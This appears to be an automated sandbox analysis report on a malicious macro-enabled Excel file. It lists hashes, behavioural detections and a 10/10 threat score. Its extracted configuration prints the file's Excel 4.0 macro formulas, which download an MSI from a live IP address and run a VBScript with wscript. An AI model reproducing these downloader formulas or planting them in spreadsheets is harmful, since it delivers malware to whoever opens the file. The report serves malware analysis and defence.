General
-
Target
075b1199ea0d3c6f015de129f1a7fa2d
-
Size
6KB
-
Sample
231221-1qp9jsbhf8
-
MD5
075b1199ea0d3c6f015de129f1a7fa2d
-
SHA1
1e565f11d90994274066b29ad8040bdf1a3a179d
-
SHA256
5dcd542d4e2ed729ac4d6bb07e9839a08a7086b16ef0ca948f25f9efa19bfcb5
-
SHA512
c5cfe0d0e345b4207d9fd249a239c1c0c0e0b96f922170f9fc6301d7819c79428dd9e3b0ab1a7df87c1d6a7aaf0e8f6aa558f0ddc7c05ea15fe6490dafd6589b
-
SSDEEP
192:NDSGuSAbrA2OmmfRX8UhHFBFYuJb98yIS+ik:NFu1M2wB1FYIb98yIv
Static task
static1
Behavioral task
behavioral1
Sample
075b1199ea0d3c6f015de129f1a7fa2d.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
075b1199ea0d3c6f015de129f1a7fa2d.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
075b1199ea0d3c6f015de129f1a7fa2d
-
Size
6KB
-
MD5
075b1199ea0d3c6f015de129f1a7fa2d
-
SHA1
1e565f11d90994274066b29ad8040bdf1a3a179d
-
SHA256
5dcd542d4e2ed729ac4d6bb07e9839a08a7086b16ef0ca948f25f9efa19bfcb5
-
SHA512
c5cfe0d0e345b4207d9fd249a239c1c0c0e0b96f922170f9fc6301d7819c79428dd9e3b0ab1a7df87c1d6a7aaf0e8f6aa558f0ddc7c05ea15fe6490dafd6589b
-
SSDEEP
192:NDSGuSAbrA2OmmfRX8UhHFBFYuJb98yIS+ik:NFu1M2wB1FYIb98yIv
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-